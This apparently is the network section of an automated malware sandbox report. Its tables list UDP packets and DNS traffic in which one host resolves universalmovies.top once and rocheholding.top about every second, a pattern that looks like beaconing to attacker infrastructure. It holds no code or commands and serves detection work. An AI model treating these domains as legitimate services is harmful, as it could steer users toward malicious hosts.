May 23, 2024 20:18:25.476716042 CEST	53	63373	8.8.8.8	192.168.2.22
May 23, 2024 20:18:26.579898119 CEST	56207	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:26.587213039 CEST	53	56207	8.8.8.8	192.168.2.22
May 23, 2024 20:18:27.495337009 CEST	51955	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:27.505067110 CEST	53	51955	8.8.8.8	192.168.2.22
May 23, 2024 20:18:28.359879017 CEST	58971	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:28.368410110 CEST	53	58971	8.8.8.8	192.168.2.22
May 23, 2024 20:18:29.273845911 CEST	51014	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:29.286659002 CEST	53	51014	8.8.8.8	192.168.2.22
May 23, 2024 20:18:30.078829050 CEST	49690	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:30.091368914 CEST	53	49690	8.8.8.8	192.168.2.22
May 23, 2024 20:18:30.942620993 CEST	60169	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:30.949893951 CEST	53	60169	8.8.8.8	192.168.2.22
May 23, 2024 20:18:31.696842909 CEST	53060	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:31.704309940 CEST	53	53060	8.8.8.8	192.168.2.22
May 23, 2024 20:18:37.662822962 CEST	49949	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:37.670048952 CEST	53	49949	8.8.8.8	192.168.2.22
May 23, 2024 20:18:38.545434952 CEST	54027	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:38.552854061 CEST	53	54027	8.8.8.8	192.168.2.22
May 23, 2024 20:18:39.366585016 CEST	63950	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:39.374072075 CEST	53	63950	8.8.8.8	192.168.2.22
May 23, 2024 20:18:40.258249998 CEST	58257	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:40.266540051 CEST	53	58257	8.8.8.8	192.168.2.22
May 23, 2024 20:18:41.194926023 CEST	54738	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:41.202218056 CEST	53	54738	8.8.8.8	192.168.2.22
May 23, 2024 20:18:41.964387894 CEST	49478	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:41.971498966 CEST	53	49478	8.8.8.8	192.168.2.22
May 23, 2024 20:18:42.894562006 CEST	49288	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:42.906310081 CEST	53	49288	8.8.8.8	192.168.2.22
May 23, 2024 20:18:43.769901991 CEST	61598	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:43.776977062 CEST	53	61598	8.8.8.8	192.168.2.22
May 23, 2024 20:18:44.703257084 CEST	58754	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:44.719610929 CEST	53	58754	8.8.8.8	192.168.2.22
May 23, 2024 20:18:45.610503912 CEST	49226	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:45.617742062 CEST	53	49226	8.8.8.8	192.168.2.22
May 23, 2024 20:18:46.503257036 CEST	54695	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:46.510543108 CEST	53	54695	8.8.8.8	192.168.2.22
May 23, 2024 20:18:47.426409006 CEST	61601	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:47.433036089 CEST	53	61601	8.8.8.8	192.168.2.22
May 23, 2024 20:18:48.336954117 CEST	54615	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:48.350919962 CEST	53	54615	8.8.8.8	192.168.2.22
May 23, 2024 20:18:49.150943041 CEST	54950	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:49.158883095 CEST	53	54950	8.8.8.8	192.168.2.22
May 23, 2024 20:18:50.047169924 CEST	64215	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:50.054630041 CEST	53	64215	8.8.8.8	192.168.2.22
May 23, 2024 20:18:51.063582897 CEST	59604	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:51.078370094 CEST	53	59604	8.8.8.8	192.168.2.22
May 23, 2024 20:18:52.355403900 CEST	49520	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:52.378161907 CEST	53	49520	8.8.8.8	192.168.2.22
May 23, 2024 20:18:53.327960014 CEST	53031	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:53.335199118 CEST	53	53031	8.8.8.8	192.168.2.22
May 23, 2024 20:18:54.296926975 CEST	53112	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:54.304356098 CEST	53	53112	8.8.8.8	192.168.2.22
May 23, 2024 20:18:55.205929995 CEST	65080	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:55.217312098 CEST	53	65080	8.8.8.8	192.168.2.22
May 23, 2024 20:18:56.074978113 CEST	50702	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:56.082659960 CEST	53	50702	8.8.8.8	192.168.2.22
May 23, 2024 20:18:56.889071941 CEST	53089	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:56.896380901 CEST	53	53089	8.8.8.8	192.168.2.22
May 23, 2024 20:18:57.777982950 CEST	51951	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:57.784815073 CEST	53	51951	8.8.8.8	192.168.2.22
May 23, 2024 20:18:58.578927994 CEST	61549	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:58.585558891 CEST	53	61549	8.8.8.8	192.168.2.22
May 23, 2024 20:18:59.505765915 CEST	57998	53	192.168.2.22	8.8.8.8
May 23, 2024 20:18:59.513384104 CEST	53	57998	8.8.8.8	192.168.2.22
May 23, 2024 20:19:00.410475969 CEST	62439	53	192.168.2.22	8.8.8.8
May 23, 2024 20:19:00.417927027 CEST	53	62439	8.8.8.8	192.168.2.22
May 23, 2024 20:19:01.344558954 CEST	59432	53	192.168.2.22	8.8.8.8
May 23, 2024 20:19:01.357151985 CEST	53	59432	8.8.8.8	192.168.2.22
May 23, 2024 20:19:02.166636944 CEST	55910	53	192.168.2.22	8.8.8.8
May 23, 2024 20:19:02.176846981 CEST	53	55910	8.8.8.8	192.168.2.22
May 23, 2024 20:19:03.302340031 CEST	61564	53	192.168.2.22	8.8.8.8
May 23, 2024 20:19:03.309638977 CEST	53	61564	8.8.8.8	192.168.2.22
May 23, 2024 20:19:04.210112095 CEST	51384	53	192.168.2.22	8.8.8.8
May 23, 2024 20:19:04.219594955 CEST	53	51384	8.8.8.8	192.168.2.22
May 23, 2024 20:19:05.117906094 CEST	53785	53	192.168.2.22	8.8.8.8
May 23, 2024 20:19:05.125282049 CEST	53	53785	8.8.8.8	192.168.2.22
May 23, 2024 20:19:06.049398899 CEST	55277	53	192.168.2.22	8.8.8.8
May 23, 2024 20:19:06.057423115 CEST	53	55277	8.8.8.8	192.168.2.22
May 23, 2024 20:19:07.004072905 CEST	51183	53	192.168.2.22	8.8.8.8
May 23, 2024 20:19:07.011307001 CEST	53	51183	8.8.8.8	192.168.2.22
May 23, 2024 20:19:07.874579906 CEST	57027	53	192.168.2.22	8.8.8.8
May 23, 2024 20:19:07.881956100 CEST	53	57027	8.8.8.8	192.168.2.22
May 23, 2024 20:19:08.815145016 CEST	50380	53	192.168.2.22	8.8.8.8
May 23, 2024 20:19:08.846313000 CEST	53	50380	8.8.8.8	192.168.2.22
May 23, 2024 20:19:09.904633999 CEST	56156	53	192.168.2.22	8.8.8.8
May 23, 2024 20:19:09.912739038 CEST	53	56156	8.8.8.8	192.168.2.22
May 23, 2024 20:19:10.723278046 CEST	60971	53	192.168.2.22	8.8.8.8
May 23, 2024 20:19:10.733256102 CEST	53	60971	8.8.8.8	192.168.2.22
May 23, 2024 20:19:11.660978079 CEST	56308	53	192.168.2.22	8.8.8.8
May 23, 2024 20:19:11.668661118 CEST	53	56308	8.8.8.8	192.168.2.22
May 23, 2024 20:19:12.582365990 CEST	51268	53	192.168.2.22	8.8.8.8
May 23, 2024 20:19:12.589925051 CEST	53	51268	8.8.8.8	192.168.2.22
May 23, 2024 20:19:13.381937981 CEST	59475	53	192.168.2.22	8.8.8.8
May 23, 2024 20:19:13.391798019 CEST	53	59475	8.8.8.8	192.168.2.22
May 23, 2024 20:19:14.262255907 CEST	62930	53	192.168.2.22	8.8.8.8
May 23, 2024 20:19:14.269871950 CEST	53	62930	8.8.8.8	192.168.2.22
May 23, 2024 20:19:15.169820070 CEST	61008	53	192.168.2.22	8.8.8.8
May 23, 2024 20:19:15.177254915 CEST	53	61008	8.8.8.8	192.168.2.22
May 23, 2024 20:19:15.991466999 CEST	59514	53	192.168.2.22	8.8.8.8
May 23, 2024 20:19:15.998914003 CEST	53	59514	8.8.8.8	192.168.2.22
May 23, 2024 20:19:16.866609097 CEST	53077	53	192.168.2.22	8.8.8.8
May 23, 2024 20:19:16.873891115 CEST	53	53077	8.8.8.8	192.168.2.22
May 23, 2024 20:19:17.638184071 CEST	53188	53	192.168.2.22	8.8.8.8
May 23, 2024 20:19:17.645247936 CEST	53	53188	8.8.8.8	192.168.2.22
May 23, 2024 20:19:18.425237894 CEST	54333	53	192.168.2.22	8.8.8.8
May 23, 2024 20:19:18.432483912 CEST	53	54333	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 23, 2024 20:17:25.248487949 CEST	192.168.2.22	8.8.8.8	0x3c0c	Standard query (0)	universalmovies.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:35.013319016 CEST	192.168.2.22	8.8.8.8	0xce84	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:36.471962929 CEST	192.168.2.22	8.8.8.8	0x77b7	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:37.973797083 CEST	192.168.2.22	8.8.8.8	0x1d8a	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:39.389893055 CEST	192.168.2.22	8.8.8.8	0xbc91	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:40.787965059 CEST	192.168.2.22	8.8.8.8	0xeb3d	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:41.812153101 CEST	192.168.2.22	8.8.8.8	0x8573	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:43.075829983 CEST	192.168.2.22	8.8.8.8	0x7dc0	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:44.091836929 CEST	192.168.2.22	8.8.8.8	0x61ec	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:45.054994106 CEST	192.168.2.22	8.8.8.8	0xa76	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:46.019932032 CEST	192.168.2.22	8.8.8.8	0x59e8	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:47.193533897 CEST	192.168.2.22	8.8.8.8	0xef97	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:48.073056936 CEST	192.168.2.22	8.8.8.8	0xa16a	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:49.040054083 CEST	192.168.2.22	8.8.8.8	0xfa26	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:50.044065952 CEST	192.168.2.22	8.8.8.8	0x9e5b	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:50.930351019 CEST	192.168.2.22	8.8.8.8	0x7e82	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:51.787807941 CEST	192.168.2.22	8.8.8.8	0x55d9	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:52.681253910 CEST	192.168.2.22	8.8.8.8	0x462b	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:53.955564022 CEST	192.168.2.22	8.8.8.8	0xde7c	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:56.032198906 CEST	192.168.2.22	8.8.8.8	0xd483	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:56.963481903 CEST	192.168.2.22	8.8.8.8	0x6a2a	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:57.904227018 CEST	192.168.2.22	8.8.8.8	0xf66b	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:58.806338072 CEST	192.168.2.22	8.8.8.8	0x45d7	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:59.746988058 CEST	192.168.2.22	8.8.8.8	0xf400	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:00.717585087 CEST	192.168.2.22	8.8.8.8	0x9109	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:01.529481888 CEST	192.168.2.22	8.8.8.8	0x99a5	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:02.352221966 CEST	192.168.2.22	8.8.8.8	0xc624	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:03.263438940 CEST	192.168.2.22	8.8.8.8	0xc016	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:04.145406961 CEST	192.168.2.22	8.8.8.8	0x8c4d	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:06.025861979 CEST	192.168.2.22	8.8.8.8	0xc569	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:07.059591055 CEST	192.168.2.22	8.8.8.8	0xf630	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:07.975244045 CEST	192.168.2.22	8.8.8.8	0xf4b1	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:08.933924913 CEST	192.168.2.22	8.8.8.8	0x3521	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:09.836658001 CEST	192.168.2.22	8.8.8.8	0xc56a	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:10.664048910 CEST	192.168.2.22	8.8.8.8	0x4e05	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:11.700437069 CEST	192.168.2.22	8.8.8.8	0x2b72	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:16.256679058 CEST	192.168.2.22	8.8.8.8	0xf18c	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:17.142232895 CEST	192.168.2.22	8.8.8.8	0xfa0a	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:18.062695980 CEST	192.168.2.22	8.8.8.8	0xaa95	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:18.956516027 CEST	192.168.2.22	8.8.8.8	0xa1cc	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:19.968893051 CEST	192.168.2.22	8.8.8.8	0xf561	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:20.867146969 CEST	192.168.2.22	8.8.8.8	0x8de3	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:21.821590900 CEST	192.168.2.22	8.8.8.8	0xdf91	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:22.757569075 CEST	192.168.2.22	8.8.8.8	0x2be1	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:23.657824039 CEST	192.168.2.22	8.8.8.8	0x47e6	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:24.550265074 CEST	192.168.2.22	8.8.8.8	0x82db	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:25.467520952 CEST	192.168.2.22	8.8.8.8	0x704a	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:26.579898119 CEST	192.168.2.22	8.8.8.8	0x98d5	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:27.495337009 CEST	192.168.2.22	8.8.8.8	0xcd9f	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:28.359879017 CEST	192.168.2.22	8.8.8.8	0xfb0f	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:29.273845911 CEST	192.168.2.22	8.8.8.8	0xa5a1	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:30.078829050 CEST	192.168.2.22	8.8.8.8	0xc549	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:30.942620993 CEST	192.168.2.22	8.8.8.8	0x3f3d	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:31.696842909 CEST	192.168.2.22	8.8.8.8	0xbac9	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:37.662822962 CEST	192.168.2.22	8.8.8.8	0x82cf	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:38.545434952 CEST	192.168.2.22	8.8.8.8	0x9000	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:39.366585016 CEST	192.168.2.22	8.8.8.8	0xeeb3	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:40.258249998 CEST	192.168.2.22	8.8.8.8	0x9716	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:41.194926023 CEST	192.168.2.22	8.8.8.8	0x683c	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:41.964387894 CEST	192.168.2.22	8.8.8.8	0x4f9c	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:42.894562006 CEST	192.168.2.22	8.8.8.8	0x763f	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:43.769901991 CEST	192.168.2.22	8.8.8.8	0xcbb6	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:44.703257084 CEST	192.168.2.22	8.8.8.8	0x25c0	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:45.610503912 CEST	192.168.2.22	8.8.8.8	0x6ef8	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:46.503257036 CEST	192.168.2.22	8.8.8.8	0xbb0	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:47.426409006 CEST	192.168.2.22	8.8.8.8	0xbfd4	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:48.336954117 CEST	192.168.2.22	8.8.8.8	0x66e	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:49.150943041 CEST	192.168.2.22	8.8.8.8	0x9279	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:50.047169924 CEST	192.168.2.22	8.8.8.8	0xaf87	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:51.063582897 CEST	192.168.2.22	8.8.8.8	0x1204	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:52.355403900 CEST	192.168.2.22	8.8.8.8	0x3a9d	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:53.327960014 CEST	192.168.2.22	8.8.8.8	0xcde	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:54.296926975 CEST	192.168.2.22	8.8.8.8	0x96c9	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:55.205929995 CEST	192.168.2.22	8.8.8.8	0x1dcb	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:56.074978113 CEST	192.168.2.22	8.8.8.8	0x3b1c	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:56.889071941 CEST	192.168.2.22	8.8.8.8	0x1323	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:57.777982950 CEST	192.168.2.22	8.8.8.8	0xd83d	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:58.578927994 CEST	192.168.2.22	8.8.8.8	0x741d	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:18:59.505765915 CEST	192.168.2.22	8.8.8.8	0x96d3	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:00.410475969 CEST	192.168.2.22	8.8.8.8	0x5508	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:01.344558954 CEST	192.168.2.22	8.8.8.8	0x8bb0	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:02.166636944 CEST	192.168.2.22	8.8.8.8	0x857f	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:03.302340031 CEST	192.168.2.22	8.8.8.8	0xee35	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:04.210112095 CEST	192.168.2.22	8.8.8.8	0xde3	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:05.117906094 CEST	192.168.2.22	8.8.8.8	0xc242	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:06.049398899 CEST	192.168.2.22	8.8.8.8	0xa5d5	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:07.004072905 CEST	192.168.2.22	8.8.8.8	0x955e	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:07.874579906 CEST	192.168.2.22	8.8.8.8	0x3bdc	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:08.815145016 CEST	192.168.2.22	8.8.8.8	0x5fde	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:09.904633999 CEST	192.168.2.22	8.8.8.8	0xa027	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:10.723278046 CEST	192.168.2.22	8.8.8.8	0x6945	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:11.660978079 CEST	192.168.2.22	8.8.8.8	0x1ac5	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:12.582365990 CEST	192.168.2.22	8.8.8.8	0x9200	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:13.381937981 CEST	192.168.2.22	8.8.8.8	0xe002	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:14.262255907 CEST	192.168.2.22	8.8.8.8	0xdc3b	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:15.169820070 CEST	192.168.2.22	8.8.8.8	0xc8bf	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:15.991466999 CEST	192.168.2.22	8.8.8.8	0x1f8e	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:16.866609097 CEST	192.168.2.22	8.8.8.8	0x3173	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:17.638184071 CEST	192.168.2.22	8.8.8.8	0x9b3b	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false
May 23, 2024 20:19:18.425237894 CEST	192.168.2.22	8.8.8.8	0xaa28	Standard query (0)	rocheholding.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
May 23, 2024 20:17:25.261668921 CEST	8.8.8.8	192.168.2.22	0x3c0c	No error (0)	universalmovies.top	104.21.74.191	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:25.261668921 CEST	8.8.8.8	192.168.2.22	0x3c0c	No error (0)	universalmovies.top	172.67.162.95	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:35.106868029 CEST	8.8.8.8	192.168.2.22	0xce84	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:35.106868029 CEST	8.8.8.8	192.168.2.22	0xce84	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:36.575613022 CEST	8.8.8.8	192.168.2.22	0x77b7	No error (0)	rocheholding.top	188.114.96.9	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:36.575613022 CEST	8.8.8.8	192.168.2.22	0x77b7	No error (0)	rocheholding.top	188.114.97.9	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:38.070122957 CEST	8.8.8.8	192.168.2.22	0x1d8a	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:38.070122957 CEST	8.8.8.8	192.168.2.22	0x1d8a	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:39.396862984 CEST	8.8.8.8	192.168.2.22	0xbc91	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:39.396862984 CEST	8.8.8.8	192.168.2.22	0xbc91	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:40.795311928 CEST	8.8.8.8	192.168.2.22	0xeb3d	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:40.795311928 CEST	8.8.8.8	192.168.2.22	0xeb3d	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:42.108488083 CEST	8.8.8.8	192.168.2.22	0x8573	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:42.108488083 CEST	8.8.8.8	192.168.2.22	0x8573	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:43.175477982 CEST	8.8.8.8	192.168.2.22	0x7dc0	No error (0)	rocheholding.top	188.114.97.9	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:43.175477982 CEST	8.8.8.8	192.168.2.22	0x7dc0	No error (0)	rocheholding.top	188.114.96.9	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:44.099220991 CEST	8.8.8.8	192.168.2.22	0x61ec	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:44.099220991 CEST	8.8.8.8	192.168.2.22	0x61ec	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:45.147840023 CEST	8.8.8.8	192.168.2.22	0xa76	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:45.147840023 CEST	8.8.8.8	192.168.2.22	0xa76	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:46.325120926 CEST	8.8.8.8	192.168.2.22	0x59e8	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:46.325120926 CEST	8.8.8.8	192.168.2.22	0x59e8	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:47.201168060 CEST	8.8.8.8	192.168.2.22	0xef97	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:47.201168060 CEST	8.8.8.8	192.168.2.22	0xef97	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:48.080511093 CEST	8.8.8.8	192.168.2.22	0xa16a	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:48.080511093 CEST	8.8.8.8	192.168.2.22	0xa16a	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:49.140233040 CEST	8.8.8.8	192.168.2.22	0xfa26	No error (0)	rocheholding.top	188.114.96.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:49.140233040 CEST	8.8.8.8	192.168.2.22	0xfa26	No error (0)	rocheholding.top	188.114.97.3	A (IP address)	IN (0x0001)	false
May 23, 2024 20:17:50.051635981 CEST	8.8.8.8	192.168.2.22	0x9e5b	No error (0)	rocheholding.top	188.114.96.9	A (IP address)	IN (0x0001)	false
